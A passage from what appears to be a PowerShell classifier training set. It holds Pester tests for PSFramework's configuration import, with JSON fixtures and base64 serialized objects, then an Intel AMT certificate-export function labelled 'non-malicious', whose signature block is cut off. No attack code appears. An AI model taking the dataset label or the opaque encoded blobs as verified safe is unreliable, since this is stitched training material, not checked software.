"Should correctly import simple style configuration" { Import-PSFConfig -Path testdrive:\Import-PSFConfig.Phase1.Config2.json Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting2' | Should -Be 23 (Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting2').GetType().FullName | Should -Be 'System.Int32' } Set-Content -Path testdrive:\Import-PSFConfig.Phase1.Config3.json -Value @' { "FullName": "import-psfconfig.phase1.setting3", "Type": 12, "Version": 1, "Value": "H4sIAAAAAAAEAK1Xa2/iOBT9vtL+B5SvC3mQ8BREKmG6iwYomtAZaaYjrUnc4h0njmxnWvbXrx0g71DQDv1A8T0+ufa599iZPOz+Ya3PkDJEwqliqIaqq4bSegtwyKbKnvNorGnM28MAMDVAHiWMPHPVI4EWkVcxbw8x1rq6bmm6pdi//9ZqTQRn6xN8XvhTRT8OicHtujImR233wDgM1MWDOkcUepzQwyJ8JhNtW4+6RxgefzXDVkDkBfDsIJ4okhGs9bhyTPy3TvMlLqcofLG/oNAnr0zEziMnxIaSiGWsbms9VdYggEo2xS2F72OMjxBn/NSI2gAKQ67YhchMRj68IcaZYnMaw4k2K837RAhPmKuUH944DKXGJdb5VkYdCgEXwS2SqXV1Y9DRR53uaGvoY6s3Ngx1MDCHA9P6Q++OdX2izbeXKB65V2DRh0WWr3UES8D4nedBxtIshh190DH6MgvdGutDtav3h9Zg1JxFkeScx5lH5FHgaczjC0Uc/s80Uo4bs0jkuuOi0nYxh0LrtC0y4SZavvYmq0oBuRvA94q9Svt1I3vVlb2qOoTCp6yLxuOLpegei/FGvjoiZ4+w39wf0jQS3Jyin1A5m4WRmUXBRArjxd4PwQsMRM7qXcxJkFSleqItW8ZlOyhZQtEWnIoh1JhCtn4npnIfl8RLEiq2Ydk/nPqg4P6JfEivE6Keo9YjsvAcMo+i6Jjig1sBrRGWsBV4Q0EcuOhfoZRWhJyEFIbgiwUjgFMtu0XNCnpWYtdomj2jLOr7wtaIWxT4lmdXC6GhGPKb+MggTfQu7WAeswGMvRLqVzFFDziPiZXWCjZHLMLgkKhfoKrS5O0k+f3Yt07p+optdM2ROdSH/ZHRnWgiVIu9p1CUsWHqo65umUbf6JexEy3vWoW8MytIC/5cJWaDG5g3usGJ9xfawXUdeYtjLIIIJ5kL/PYQwcauDwIQ+ix3MTovr77F/4I4kljl8h75GHckVBVXwUte9Z7hbFw3BNEivGBa9RNXxI8xPD7k+qlng0omV7yp6nH1z3ZABHYII47kCSyWyCFtt9w9ibEvdldeMNqtzAFYw06T001Pdjp7uqcI+hR5+wr6VPDJEcXSYrcu2GUlli9ch2AsKlesj52KWGwHxLnxv41v3649L8W6LyDb6cuDKd4cxJ/YlxjzmMJpCGNOAW63NvEOI+8jPGzJDyiAxu7ZHPb6wDf7FjR737//OvdeujVMYs+ya0Od2br2vKyJpC+Tle217J0lG5sdy3/BHBJygEJ5cNdf3KU8iu135Kd6dZoBBt+9N20BfYE8rZ1eg1H2mowyXzN/QpEr8tSleNnIVcrRutqtgHmEYrTLpLeulX43GICe1+sbI9OC+nBUlf42+xUK5fQs7f/JCpYo/JH4Z4pMz57zhOSb2f8BpzdzLA0PAAA=", "Style": "Default" } '@ It "Should correctly defer deserialization until being explicitly requested" { Import-PSFConfig -Path testdrive:\Import-PSFConfig.Phase1.Config3.json (Get-PSFConfig -FullName 'Import-PSFConfig.Phase1.Setting3').SafeValue.Name | Should -BeNullOrEmpty (Get-PSFConfig -FullName 'Import-PSFConfig.Phase1.Setting3').Value.Name | Should -Be 'Windows' } } Describe "Import paths / methodologies are applied" { It "Should correctly import configuration from a weblink" { $webLink = 'https://raw.githubusercontent.com/PowershellFrameworkCollective/psframework/master/PSFramework/tests/testdata/configdata.json' Get-PSFConfigValue -FullName 'config.import.test' | Should -BeNullOrEmpty { Import-PSFConfig -Path $webLink -ErrorAction Stop -EnableException } | Should -Not -Throw Get-PSFConfigValue -FullName 'config.import.test' | Should -Be 42 } It "Should correctly import raw json data for configuration" { $json = @' { "FullName": "import-psfconfig.phase2.setting1", "Type": 3, "Version": 1, "Value": "42", "Style": "Default" } '@ { $json | Import-PSFConfig } | Should -Not -Throw Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting1' | Should -Be 42 } It "Should allow peek at settings without importing them" { $json = @' { "FullName": "import-psfconfig.phase2.setting2", "Type": 3, "Version": 1, "Value": "42", "Style": "Default" } '@ $data = $json | Import-PSFConfig -Peek Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting2' | Should -BeNullOrEmpty $data.FullName | Should -Be 'import-psfconfig.phase2.setting2' $data.Value | Should -Be 42 $data.KeepPersisted | Should -Be $false } It "Should correctly filter out unwanted settings" { $json1 = @' [ { "FullName": "import-psfconfig.phase2.setting3", "Type": 3, "Version": 1, "Value": "3", "Style": "Default" }, { "FullName": "import-psfconfig.phase2.setting4", "Type": 3, "Version": 1, "Value": "4", "Style": "Default" }, { "FullName": "import-psfconfig.phase2.setting8", "Type": 3, "Version": 1, "Value": "8", "Style": "Default" } ] '@ $json2 = @' [ { "FullName": "import-psfconfig.phase2.setting7", "Type": 3, "Version": 1, "Value": "7", "Style": "Default" }, { "FullName": "import-psfconfig.phase2.setting10", "Type": 3, "Version": 1, "Value": "10", "Style": "Default" }, { "FullName": "import-psfconfig.phase2.setting9", "Type": 3, "Version": 1, "Value": "9", "Style": "Default" }, { "FullName": "import-psfconfig.phase2.setting5", "Type": 3, "Version": 1, "Value": "5", "Style": "Default" }, { "FullName": "import-psfconfig.phase2.setting6", "Type": 3, "Version": 1, "Value": "6", "Style": "Default" } ] '@ { $json1 | Import-PSFConfig -IncludeFilter 'import-psfconfig.phase2.setting3', 'import-psfconfig.phase2.setting4' } | Should -Not -Throw Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting3' | Should -Be 3 Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting4' | Should -Be 4 Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting8' | Should -BeNullOrEmpty { $json2 | Import-PSFConfig -ExcludeFilter 'import-psfconfig.phase2.setting5', 'import-psfconfig.phase2.setting6', 'import-psfconfig.phase2.setting7' } | Should -Not -Throw Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting5' | Should -BeNullOrEmpty Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting6' | Should -BeNullOrEmpty Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting7' | Should -BeNullOrEmpty Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting9' | Should -Be 9 Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting10' | Should -Be 10 } } Describe "The module cache feature import is working as designed" { $module = Get-Module PSFramework | Sort-Object Version -Descending | Select-Object -First 1 $pathFileUserLocal = & $module { $path_FileUserLocal } $pathFileUserShared = & $module { $path_FileUserShared } $pathFileSystem = & $module { $path_FileSystem } $json1 = @' { "FullName": "Import-PSFConfig.phase3.Setting1", "Type": 3, "Version": 1, "Value": "42", "Style": "Default" } '@ $json2 = @' { "FullName": "Import-PSFConfig.phase3.Setting2", "Type": 3, "Version": 1, "Value": "23", "Style": "Default" } '@ Set-Content -Path "$($pathFileUserLocal)\import-psfconfig-1.json" -Value $json1 Set-Content -Path "$($pathFileUserShared)\import-psfconfig-1.json" -Value $json2 It "Should import cached settings from the module cache" { Import-PSFConfig -ModuleName 'Import-PSFConfig' Get-PSFConfigValue 'import-psfconfig.phase3.setting1' | Should -Be 42 Get-PSFConfigValue 'import-psfconfig.phase3.setting2' | Should -Be 23 } } Describe "Imports successfully MetaJson Schema Configuration" { $json1 = @' { "ModuleName": "MetaJson", "Version": 1, "Static": { "Setting1": 42 }, "Object": { "Setting3": "H4sIAAAAAAAEALVXW2/iOBh9X2n/A8oz5ELCVYBUYLqLBiia0Blp20prErd468SR7UzL/vp1EkIS4gTa1bRSC/b5rj4+tkd3u39Y4zukDBF/rBiqoeqqoTTePeyzsbLnPBhqGnP20ANM9ZBDCSPPXHWIpwXkTdjtIcZaW9ctTbeUye+/NRoj4bPxDT4v3LGiJ0NicLsujUWjE/vAOPRUYQMd/vA00raS2RtKwUE+lRhmc+LTOv24tHMWuayMLINCZoXxfJDFnTpHVMQh9LDwn0k+lRLyFmGYfKuHroDoHsDTg4h+XsWlKs8qTcDE5hT5L5M77Iq59FsOsaEkYMUIdmM9VtbAg0piZkumb0OME8hs+CiyCR4roRtAoc+VSYQqIaYR4ss7YpwJBA3hSJtKfHwjhMeh5CG+vHPoR3RVJiXAfBshZhQCLgBbFOXc1o1BS2+3DHNr6EO9N+x01W7P7LQH7ZbeH+r6SJtvL7m5507RU7/o6a8qJ0vA+I3jQMak2fSHlq6a/V67N6hPpuhHlk7OVW02Pyji8P8nc3Lz8VziZbzhgp67kEPBhdPeKi7oSDsn7GglJZ29AXyvTFYnedpE0mRH0qTOCIWP2ZYcDi9z2E5Y/AmnVQ5ne4Td6l0WSVOMm1P0EyqpHLWLclSQqtJcUVl88AI9UYN6E3LixTRWj+5lolQ0l4tRSXASo1RmZlLJiTFl2cl6Mwtp1OslceIk5cqRwY8yJAWkXaTkJ3IhPbXRLLcqcnfVykoDaSJSRX6V2pVB5pA5FAVJtXf2HLFXKXiNcARfgXfkhZ6N/hXE0CqrFmLlij4igE91W9K6MwpJ+3INjbJYMh4VfVRxKWlkiU+Jccqjj+Qh517sT86/fJPvGaQxtSQdzuM2gLE3Ql05rqxX6biUMEefggABBoeYOSW3cpfnMhiP3XetYymuMrHMjt4x+33THLRHmpiqxN9SKHZUp9+zjG6va4m/MvxIO1feUk2ZipV2YKdGyCQsvcjAo/9fpGTX6cJnxG7hBTiuRthtDwGsPF08D/guy90k05KrZeVPiIMIr9T3zsW4FUFVccO/JLMXZPB4ttk+CBZ+zUFZbbwibohhEuxj5qk4xg6kuljW2uo8ZiAAO4QRR9FtRJTNIW027D0JsSs6H926mo1MbVjNKpDjNTlSFPb4TN8g8j1Qd17FhzI77ZXuBdUu7aUUka77jGAsSC9KZkf+iy5BnBv/23h4uPamINpQg2yeno6meDeKX9GmEPOQwrEPQ04BbjY24Q4j5ys8bMkrFEBj92z2O13gml0Lmp2np19ziOTffoUJ0cfsElWh4zJjmYrL5FmijNNkpyzYjPgcIF9IY837J1ouZeK2oh/5hXIKGLx4m9wC+gL5iVe9Gg2WcE7Opz+gyB056lK84XIsSpSw2fCYQyhGu4wW1rW02PV6oON0usbAtKDeH8hp8TllF6t5ts6SNToqyhL5r7E0FywKx1/eOKNKOhr/Z5P/ANjaD5pZEQAA" }, "Dynamic": { "Setting2": "Foo: %COMPUTERNAME%" } } '@ $json2 = @' { "Version": 1, "Static": { "MetaJson.Setting4": 42 }, "Object": { "MetaJson.Setting5": "H4sIAAAAAAAEALVXW2/iOBh9X2n/A8oz5ELCVYBUYLqLBiia0Blp20prErd468SR7UzL/vp1EkIS4gTa1bRSC/b5rj4+tkd3u39Y4zukDBF/rBiqoeqqoTTePeyzsbLnPBhqGnP20ANM9ZBDCSPPXHWIpwXkTdjtIcZaW9ctTbeUye+/NRoj4bPxDT4v3LGiJ0NicLsujUWjE/vAOPRUYQMd/vA00raS2RtKwUE+lRhmc+LTOv24tHMWuayMLINCZoXxfJDFnTpHVMQh9LDwn0k+lRLyFmGYfKuHroDoHsDTg4h+XsWlKs8qTcDE5hT5L5M77Iq59FsOsaEkYMUIdmM9VtbAg0piZkumb0OME8hs+CiyCR4roRtAoc+VSYQqIaYR4ss7YpwJBA3hSJtKfHwjhMeh5CG+vHPoR3RVJiXAfBshZhQCLgBbFOXc1o1BS2+3DHNr6EO9N+x01W7P7LQH7ZbeH+r6SJtvL7m5507RU7/o6a8qJ0vA+I3jQMak2fSHlq6a/V67N6hPpuhHlk7OVW02Pyji8P8nc3Lz8VziZbzhgp67kEPBhdPeKi7oSDsn7GglJZ29AXyvTFYnedpE0mRH0qTOCIWP2ZYcDi9z2E5Y/AmnVQ5ne4Td6l0WSVOMm1P0EyqpHLWLclSQqtJcUVl88AI9UYN6E3LixTRWj+5lolQ0l4tRSXASo1RmZlLJiTFl2cl6Mwtp1OslceIk5cqRwY8yJAWkXaTkJ3IhPbXRLLcqcnfVykoDaSJSRX6V2pVB5pA5FAVJtXf2HLFXKXiNcARfgXfkhZ6N/hXE0CqrFmLlij4igE91W9K6MwpJ+3INjbJYMh4VfVRxKWlkiU+Jccqjj+Qh517sT86/fJPvGaQxtSQdzuM2gLE3Ql05rqxX6biUMEefggABBoeYOSW3cpfnMhiP3XetYymuMrHMjt4x+33THLRHmpiqxN9SKHZUp9+zjG6va4m/MvxIO1feUk2ZipV2YKdGyCQsvcjAo/9fpGTX6cJnxG7hBTiuRthtDwGsPF08D/guy90k05KrZeVPiIMIr9T3zsW4FUFVccO/JLMXZPB4ttk+CBZ+zUFZbbwibohhEuxj5qk4xg6kuljW2uo8ZiAAO4QRR9FtRJTNIW027D0JsSs6H926mo1MbVjNKpDjNTlSFPb4TN8g8j1Qd17FhzI77ZXuBdUu7aUUka77jGAsSC9KZkf+iy5BnBv/23h4uPamINpQg2yeno6meDeKX9GmEPOQwrEPQ04BbjY24Q4j5ys8bMkrFEBj92z2O13gml0Lmp2np19ziOTffoUJ0cfsElWh4zJjmYrL5FmijNNkpyzYjPgcIF9IY837J1ouZeK2oh/5hXIKGLx4m9wC+gL5iVe9Gg2WcE7Opz+gyB056lK84XIsSpSw2fCYQyhGu4wW1rW02PV6oON0usbAtKDeH8hp8TllF6t5ts6SNToqyhL5r7E0FywKx1/eOKNKOhr/Z5P/ANjaD5pZEQAA" }, "Dynamic": { "MetaJson.Setting6": "Foo: %COMPUTERNAME%" } } '@ $json3 = @' { "Static": { "Setting7": 42 }, "ModuleName": "MetaJson", "Include": [ ".\\MetaJson.include1.json", ".\\%COMPUTERNAME%\\MetaJson.include2.json" ], "Version": 1 } '@ $json4 = @' { "Static": { "Setting7": 23 }, "ModuleName": "MetaJson", "Version": 1 } '@ $json5 = @' { "Dynamic": { "%COMPUTERNAME%": 7 }, "ModuleName": "MetaJson", "Version": 1 } '@ Set-Content -Value $json1 -Path 'testdrive:\MetaJson1.json' Set-Content -Value $json2 -Path 'testdrive:\MetaJson2.json' Set-Content -Value $json3 -Path 'testdrive:\MetaJson3.json' Set-Content -Value $json4 -Path 'testdrive:\MetaJson.include1.json' $null = New-Item -Path 'testdrive:\' -Name $env:COMPUTERNAME -ItemType Directory Set-Content -Value $json5 -Path "testdrive:\$($env:COMPUTERNAME)\MetaJson.include2.json" It "Should import a plain file import with Modulename correctly" { { Import-PSFConfig -Path 'testdrive:\MetaJson1.json' -Schema MetaJson -EnableException } | Should -Not -Throw Get-PSFConfigValue -FullName MetaJson.Setting1 | Should -Be 42 Get-PSFConfigValue -FullName MetaJson.Setting2 | Should -Be "Foo: $env:COMPUTERNAME" (Get-PSFConfigValue -FullName MetaJson.Setting3).Name | Should -Be 'Old' } It "Should import a plain file import without Modulename correctly" { { Import-PSFConfig -Path 'testdrive:\MetaJson2.json' -Schema MetaJson -EnableException } | Should -Not -Throw Get-PSFConfigValue -FullName MetaJson.Setting4 | Should -Be 42 Get-PSFConfigValue -FullName MetaJson.Setting6 | Should -Be "Foo: $env:COMPUTERNAME" (Get-PSFConfigValue -FullName MetaJson.Setting5).Name | Should -Be 'Old' } It "Should import a file with include files correctly" { { Import-PSFConfig -Path 'testdrive:\MetaJson3.json' -Schema MetaJson -EnableException } | Should -Not -Throw Get-PSFConfigValue -FullName MetaJson.Setting7 | Should -Be 23 Get-PSFConfigValue -FullName "MetaJson.$($env:COMPUTERNAME)" | Should -Be 7 } } }
combined_dataset/train/non-malicious/sample_45_32.ps1
sample_45_32.ps1
# Copyright (C) Intel Corporation, 2007 - 2019 All Rights Reserved. Function Export-CertForAMT { <# .Synopsis Exports certificates from the Windows Certificate Store for use by the IntelvPro PowerShell Module .Description Exports certificates from the Windows Certificate Store for use by the IntelvPro PowerShell Module. .Link http:\\vproexpert.com http:\\www.intel.com\vpro http:\\www.intel.com .Example Export-CertForAMT -DestinationPath:"c:\temp\certs.pem" Completed exporting certificates .Example Export-CertForAMT -DestinationPath c:\temp\cert.pem -NoOutput $True #> [CmdletBinding()] Param ( [Parameter(Mandatory=$true,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, HelpMessage="Destination path")] [string] $DestinationPath, [Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, HelpMessage="Store Location")] [string] $StoreLocation, [Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, HelpMessage="Supress Output")] [bool] $NoOutput ) PROCESS { $Results = @() if($StoreLocation -eq "") { $StoreLocation = "Root" } $fs = New-Object System.IO.FileStream($DestinationPath,[System.IO.FileMode]::Create,[System.IO.FileAccess]::ReadWrite) $store = New-Object System.Security.Cryptography.X509Certificates.X509Store($StoreLocation,[System.Security.Cryptography.X509Certificates.StoreLocation]::CurrentUser) $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadOnly) $CommaTok = New-Object System.String[] 1 $EqualTok = New-Object System.String[] 1 $CommaTok[0] = "," $EqualTok[0] = "=" $CRLF = ([char]13).ToString() + ([char]10).ToString() Foreach ($cert in $store.Certificates) { $name = $CRLF $tokens = $cert.SubjectName.Name.Split($CommaTok,[System.StringSplitOptions]::None) Foreach ($tok in $tokens) { $items = $tok.Split($EqualTok,[System.StringSplitOptions]::None) if($items[0] -eq "CN") { $name = $items[1] + $CRLF break } } $raw = $cert.Export([System.Security.Cryptography.X509Certificates.X509ContentType]::Cert) $b64Cert = [System.Convert]::ToBase64String($raw) $formattedCert = New-Object System.Text.StringBuilder for($i=0 ; $i -lt $b64Cert.Length; ++$i) { if($i % 64 -eq 0 -and $i -ne 0) { [void]$formattedCert.Append($CRLF) } [void]$formattedCert.Append($b64Cert[$i].ToString()) } $b64Cert = $name + "-----BEGIN CERTIFICATE-----" + $CRLF + $formattedCert.ToString() + $CRLF + "-----END CERTIFICATE-----" + $CRLF + $CRLF $exportCert = [System.Text.Encoding]::ASCII.GetBytes($b64Cert) $fs.Write($exportCert, 0, $exportCert.Length); } $fs.Close() if ($NoOutput -ne 1) { Write-Host "Completed exporting certificates" } } } # SIG # Begin signature block # MIIo1wYJKoZIhvcNAQcCoIIoyDCCKMQCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA9jOhq09elMHJS # AVhQGM6k8gVlxG6HTVFOGcecys23KaCCEe8wggWIMIIEcKADAgECAhAK3oEU12eb # Bm8tst/S9nrCMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAkdCMRswGQYDVQQI # ExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoT # D1NlY3RpZ28gTGltaXRlZDEkMCIGA1UEAxMbU2VjdGlnbyBSU0EgQ29kZSBTaWdu # aW5nIENBMB4XDTIxMDQwNTAwMDAwMFoXDTIzMDQwNTIzNTk1OVowcDELMAkGA1UE # BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFDASBgNVBAcMC1NhbnRhIENsYXJh # MRowGAYDVQQKDBFJbnRlbCBDb3Jwb3JhdGlvbjEaMBgGA1UEAwwRSW50ZWwgQ29y # cG9yYXRpb24wggGiMA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQDjUVXd0eS2 # a1cJleh4bp6C5ngpid1fyZl3x1O7UH31slBxqjtjD45nsKBbDATVW/ZH0zqbLQ0P # pQLpLbBVHEFasianjtLSjFXs1pJJ14rfuZCyiOaFFCGYqb/fLQ2ZBq/0riDFgwfC # YS80SIV7V+hq+XJhpsUms/5QPqRilRnk+OPlbikQktkUVWi1qN7pkjkC5NgTDLnz # oxGP3OYA6x+ac3/NMQYnRXzbjACLUq70L2hDC8sDwaCQXavaUG29FF4MjwE8MzMx # DqcjpZmaO/jbTpExgMBfkDa+vqWSb99gdAeJI/JZXAeuYgGQ+66aIhwmRGsqQIXT # z4ofo+mRQMgSXatXEOtuBrC5q5GZUnWTTrdfnkdxg0oD9CsttmZg6Fhu5mTLYbJ+ # lKrV/JtSjKNgtQdYXCtnV5FRRzlqcjXqsXG+Q1YaY/n0lTEwCAqJyRMyJLuK/S/U # MUfPw9BvDQbpyB3ARSD4FJ3glwv9UDKd/BmQ2SVGpS+3/7whm633YIMCAwEAAaOC # AZAwggGMMB8GA1UdIwQYMBaAFA7hOqhTOjHVir7Bu61nGgOFrTQOMB0GA1UdDgQW # BBS5qxx6xBgtLKbRn3jrB6dtnHz6VDAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/ # BAIwADATBgNVHSUEDDAKBggrBgEFBQcDAzARBglghkgBhvhCAQEEBAMCBBAwSgYD # VR0gBEMwQTA1BgwrBgEEAbIxAQIBAwIwJTAjBggrBgEFBQcCARYXaHR0cHM6Ly9z # ZWN0aWdvLmNvbS9DUFMwCAYGZ4EMAQQBMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6 # Ly9jcmwuc2VjdGlnby5jb20vU2VjdGlnb1JTQUNvZGVTaWduaW5nQ0EuY3JsMHMG # CCsGAQUFBwEBBGcwZTA+BggrBgEFBQcwAoYyaHR0cDovL2NydC5zZWN0aWdvLmNv # bS9TZWN0aWdvUlNBQ29kZVNpZ25pbmdDQS5jcnQwIwYIKwYBBQUHMAGGF2h0dHA6 # Ly9vY3NwLnNlY3RpZ28uY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBAdvRj4EEZ88QF # gAGQZABeZB6XbzWNZaFrDGmZMTqREok2QqB6QxdyPSsAFEL5mVfwnD5f8F8iHx+W # aZXjKHbSvn1f1CAMFMc/i7Byrr984Obp2raebwFNRUO7l2lewLCgkRBlb3+W7Hud # eTGoTzhJL/Qcvy1jLT0VmhLJbvYjEpBuQ62z7MQH7HltsfjRnDu1RpqKsYWJuCt6 # tOSNn7MZ8vb5nsZEIqRoonucy4Yp1ItP/uXuLc4KcdLh+TzNUiXWWK6qQ6TqeeJp # Z34IjoS1FvjXLV4ACypUuUvmEIq691NseI4ByVHCZyMa59A6Scpp+kadDUEw0LZj # t9LGvtWIMIIF9TCCA92gAwIBAgIQHaJIMG+bJhjQguCWfTPTajANBgkqhkiG9w0B # AQwFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNV # BAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx # LjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw # HhcNMTgxMTAyMDAwMDAwWhcNMzAxMjMxMjM1OTU5WjB8MQswCQYDVQQGEwJHQjEb # MBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRgw # FgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJDAiBgNVBAMTG1NlY3RpZ28gUlNBIENv # ZGUgU2lnbmluZyBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAIYi # jTKFehifSfCWL2MIHi3cfJ8Uz+MmtiVmKUCGVEZ0MWLFEO2yhyemmcuVMMBW9aR1 # xqkOUGKlUZEQauBLYq798PgYrKf/7i4zIPoMGYmobHutAMNhodxpZW0fbieW15dR # hqb0J+V8aouVHltg1X7XFpKcAC9o95ftanK+ODtj3o+/bkxBXRIgCFnoOc2P0tbP # BrRXBbZOoT5Xax+YvMRi1hsLjcdmG0qfnYHEckC14l/vC0X/o84Xpi1VsLewvFRq # nbyNVlPG8Lp5UEks9wO5/i9lNfIi6iwHr0bZ+UYc3Ix8cSjz/qfGFN1VkW6KEQ3f # BiSVfQ+noXw62oY1YdMCAwEAAaOCAWQwggFgMB8GA1UdIwQYMBaAFFN5v1qqK0rP # VIDh2JvAnfKyA2bLMB0GA1UdDgQWBBQO4TqoUzox1Yq+wbutZxoDha00DjAOBgNV # HQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHSUEFjAUBggrBgEF # BQcDAwYIKwYBBQUHAwgwEQYDVR0gBAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBD # oEGGP2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZp # Y2F0aW9uQXV0aG9yaXR5LmNybDB2BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKG # M2h0dHA6Ly9jcnQudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENB # LmNydDAlBggrBgEFBQcwAYYZaHR0cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkq # hkiG9w0BAQwFAAOCAgEATWNQ7Uc0SmGk295qKoyb8QAAHh1iezrXMsL2s+Bjs/th # AIiaG20QBwRPvrjqiXgi6w9G7PNGXkBGiRL0C3danCpBOvzW9Ovn9xWVM8Ohgyi3 # 3i/klPeFM4MtSkBIv5rCT0qxjyT0s4E307dksKYjalloUkJf/wTr4XRleQj1qZPe # a3FAmZa6ePG5yOLDCBaxq2NayBWAbXReSnV+pbjDbLXP30p5h1zHQE1jNfYw08+1 # Cg4LBH+gS667o6XQhACTPlNdNKUANWlsvp8gJRANGftQkGG+OY96jk32nw4e/gdR # EmaDJhlIlc5KycF/8zoFm/lv34h/wCOe0h5DekUxwZxNqfBZslkZ6GqNKQQCd3xL # S81wvjqyVVp4Pry7bwMQJXcVNIr5NsxDkuS6T/FikyglVyn7URnHoSVAaoRXxrKd # sbwcCtp8Z359LukoTBh+xHsxQXGaSynsCz1XUNLK3f2eBVHlRHjdAd6xdZgNVCT9 # 8E7j4viDvXK6yz067vBeF5Jobchh+abxKgoLpbn0nu6YMgWFnuv5gynTxix9vTp3 # Los3QqBqgu07SqqUEKThDfgXxbZaeTMYkuO1dfih6Y4KJR7kHvGfWocj/5+kUZ77 # OYARzdu1xKeogG/lU9Tg46LC0lsa+jImLWpXcBw8pFguo/NbSwfcMlnzh6cabVgw # ggZmMIIETqADAgECAhMzAAAARLc//O9az6J6AAAAAABEMA0GCSqGSIb3DQEBBQUA # MH8xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKTAnBgNVBAMT # IE1pY3Jvc29mdCBDb2RlIFZlcmlmaWNhdGlvbiBSb290MB4XDTE1MDcyMjIxMDM0 # OVoXDTI1MDcyMjIxMDM0OVowgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpOZXcg # SmVyc2V5MRQwEgYDVQQHEwtKZXJzZXkgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJU # UlVTVCBOZXR3b3JrMS4wLAYDVQQDEyVVU0VSVHJ1c3QgUlNBIENlcnRpZmljYXRp # b24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgBJl # FzYOw9sIs9CsVw127c0n00ytUINh4qogTQktZAnczomfzD2p7PbPwdzx07HWezco # EStH2jnGvDoZtF+mvX2do2NCtnbyqTsrkfjib9DsFiCQCT7i6HTJGLSR1GJk23+j # BvGIGGqQIjy8/hPwhxR79uQfjtTkUcYRZ0YIUcuGFFQ/vDP+fmyc/xadGL1RjjWm # p2bIcmfbIWax1Jt4A8BQOujM8Ny8nkz+rwWWNR9XWrf/zvk9tyy29lTdyOcSOk2u # TIq3XJq0tyA9yn8iNK5+O2hmAUTnAU5GU5szYPeUvlM3kHND8zLDU+/bqv50TmnH # a4xgk97Exwzf4TKuzJM7UXiVZ4vuPVb+DNBpDxsP8yUmazNt925H+nND5X4OpWax # KXwyhGNVicQNwZNUMBkTrNN9N6frXTpsNVzbQdcS2qlJC9/YgIoJk2KOtWbPJYjN # hLixP6Q5D9kCnusSTJV882sFqV4Wg8y4Z+LoE53MW4LTTLPtW//e5XOsIzstAL81 # VXQJSdhJWBp/kjbmUZIO8yZ9HE0XvMnsQybQv0FfQKlERPSZ51eHnlAfV1SoPv10 # Yy+xUGUJ5lhCLkMaTLTwJUdZ+gQek9QmRkpQgbLevni3/GcV4clXhB4PY9bpYrrW # X1Uu6lzGKAgEJTm4Diup8kyXHAc/DVL17e8vgg8CAwEAAaOB0DCBzTATBgNVHSUE # DDAKBggrBgEFBQcDAzASBgNVHRMBAf8ECDAGAQH/AgECMB0GA1UdDgQWBBRTeb9a # qitKz1SA4dibwJ3ysgNmyzALBgNVHQ8EBAMCAYYwHwYDVR0jBBgwFoAUYvsKIVt/ # Q24R2glUUGv10pZx8Z4wVQYDVR0fBE4wTDBKoEigRoZEaHR0cDovL2NybC5taWNy # b3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljcm9zb2Z0Q29kZVZlcmlmUm9v # dC5jcmwwDQYJKoZIhvcNAQEFBQADggIBAGsikzw9OVRxZGsO8uQ8MBHFIEpLhg+S # 8f8zeTrZ5JinDkCgIoB+YbLgpxnPJpUxKmXUak8xhurAxi7FZIw9SFnNCy90PZQm # ExBC1JeYJ148dtJ4aR0aZOcFcnXg62ZAQ5+PDEb/l2CmyGetEAibYqbpvjqK0wdN # n3KTJbwGEeAskDg+Zxz9GdeekM49wuDnYazA5QT1HplUDJENAVZxN64n1J5DIqXJ # 